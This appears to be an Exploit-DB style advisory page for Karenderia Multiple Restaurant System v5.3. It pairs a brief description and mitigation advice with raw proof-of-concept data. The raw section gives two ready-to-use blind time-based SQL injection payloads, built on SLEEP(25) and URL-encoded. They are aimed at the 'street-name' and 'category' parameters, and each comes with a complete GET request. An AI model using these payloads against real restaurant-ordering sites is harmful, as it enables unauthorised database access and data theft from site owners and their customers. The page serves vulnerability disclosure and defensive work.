Karenderia CMS 5.3 - Multiple SQL Vuln.

vendor:

Karenderia Multiple Restaurant System

by:

Mehmet EMIROGLU

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Karenderia Multiple Restaurant System

Affected Version From: v5.3

Affected Version To: v5.3

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Wamp64, Windows

2019

Karenderia CMS 5.3 – Multiple SQL Vuln.

The Karenderia CMS 5.3 is vulnerable to multiple SQL injection vulnerabilities. An attacker can exploit these vulnerabilities by injecting malicious SQL queries through the 'street-name' parameter. This can lead to unauthorized access, data leakage, or remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before executing SQL queries. Additionally, using parameterized queries or prepared statements can help prevent SQL injection attacks.

Source

Exploit-DB raw data:

===========================================================================================
# Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
# Dork: N/A
# Date: 05-07-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: buyer2@codemywebapps.com
# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Karenderia Multiple Restaurant System is a
restaurant food ordering and restaurant membership system.
===========================================================================================
# POC - SQLi (Blind)
# Parameters : street-name
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f

# GET Method :
http://localhost/kmrs/searcharea?st=Los%20Angeles,%20CA,%20United%20States&street-name=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln.
# Dork: N/A
# Date: 05-07-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: buyer2@codemywebapps.com
# Software Link: https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Karenderia Multiple Restaurant System is a
restaurant food ordering and restaurant membership system.
===========================================================================================
# POC - SQLi (Blind)
# Parameters : category
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# GET Method :
http://localhost/kmrs/store/cuisine/?category=1%20+%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))/*'XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR'|
"XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR"*/&page=2
===========================================================================================